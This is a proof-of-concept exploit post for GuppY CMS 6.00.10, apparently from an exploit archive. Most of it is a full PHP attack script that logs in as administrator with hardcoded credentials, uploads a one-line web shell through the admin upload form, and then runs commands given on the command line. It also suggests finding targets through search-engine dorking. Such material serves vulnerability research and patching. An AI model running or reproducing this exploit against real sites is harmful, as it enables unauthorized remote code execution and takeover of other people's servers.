=============================================================================================================================================
| # Title     : GuppY CMS 6.00.10 php Code Execution Vulnerability                                                                          |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://www.freeguppy.org/                                                                                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability.

[+] Improvements : (Related : https://packetstorm.news/files/id/168584/ Related CVE numbers:   ) .

    Fixed CURLOPT_* bugs.
	
    Improved input checking (getopt).
	
    Improved handling of cookie.txt using a temporary file.
	
    Added urlencode($command) to ensure no problems with special characters.
	
    Improved HTTP code checking and response more accurately.

[+] save code as poc.php.

[+] Usage : php poc.php -u http://target.org/ -c whoami

[+] PayLoad :

#!/usr/bin/php
<?php

$username = "Admin";
$password = "rose1337";

$options = getopt('u:c:');
if(empty($options['u']) || empty($options['c'])) {
    die("\n GuppY 6.00.10 CMS Remote Code Execution \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n");
}

$target = $options['u'];
$command = $options['c'];

$cookie = tempnam(sys_get_temp_dir(), 'cookie_');

// تسجيل الدخول كمشرف
$url = "{$target}guppy/connect.php";
$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
$curlObj = curl_init();

curl_setopt_array($curlObj, [
    CURLOPT_URL => $url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER => 1,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_POSTFIELDS => $postdata,
    CURLOPT_POST => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_CONNECTTIMEOUT => 10,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_COOKIEJAR => $cookie,
    CURLOPT_COOKIEFILE => $cookie
]);

$result = curl_exec($curlObj);

// رفع Web Shell
$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
$post = '------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="rep"

file
------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="ficup"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET["cmd"]); ?>

------WebKitFormBoundarygA1APFcUlkIaWal4--
';

$headers = [
    'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
    'User-Agent: Mozilla/5.0',
    'Accept-Encoding: gzip, deflate',
    'Accept-Language: en-US,en;q=0.9'
];

curl_setopt_array($curlObj, [
    CURLOPT_URL => $url2,
    CURLOPT_POSTFIELDS => $post,
    CURLOPT_HTTPHEADER => $headers,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_FOLLOWLOCATION => true
]);

$data = curl_exec($curlObj);

// تنفيذ الأمر
$shell = "{$target}guppy/file/shell.php?cmd=" . urlencode($command);
curl_setopt_array($curlObj, [
    CURLOPT_URL => $shell,
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded'],
    CURLOPT_POST => false,
    CURLOPT_RETURNTRANSFER => true
]);

$exec_shell = curl_exec($curlObj);
$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);

if ($code < 200 || $code >= 300) {
    echo "\n[-] Something went wrong! HTTP Code: $code\n";
} else {
    print("\n$exec_shell\n");
}

curl_close($curlObj);
unlink($cookie);
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================